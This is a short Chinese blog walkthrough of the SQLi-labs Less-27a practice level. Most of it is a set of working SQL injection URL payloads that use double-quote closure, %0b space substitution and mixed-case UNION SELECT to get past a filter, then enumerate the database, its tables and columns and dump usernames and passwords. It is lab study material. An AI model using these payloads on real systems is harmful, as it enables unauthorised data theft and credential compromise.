zoukankan      html  css  js  c++  java

  • Less(27a)GET

    1.和Less(27)一样,就是把单引号闭合变成双引号闭合

      验证一下:?id=0"%0bor(1)=(1)%26%26%0b"1

      

     2.爆破:

      (1)爆库: ?id=0"%0buniOn%0bsElEct%0b1,database(),3%0bor%0b"1"="1  

        

      (2)爆表:?id=0"%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security'%0b%26%26%0b"1"="1

        

      (3)爆列名:?id=0"%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b"1"="1

        

      (4)爆值:?id=0"%0buniOn%0bsElEct%0b1,(group_concat(username,0x7e,password)),3%0bfrom%0busers%0buniOn%0bseLect (1),(2),"(3

        
  • 相关阅读:
    cf854B Maxim Buys an Apartment
    Snuke's Coloring 2-1
    P1087 FBI树
    Card Game for Three
    Many Formulas
    排队
    苹果消消乐(尺取法)
    猴子选大王(约瑟夫)
    进制转化
    UIProgress控件的属性和方法
  • 原文地址:https://www.cnblogs.com/meng-yu37/p/12403017.html
Copyright © 2011-2022 走看看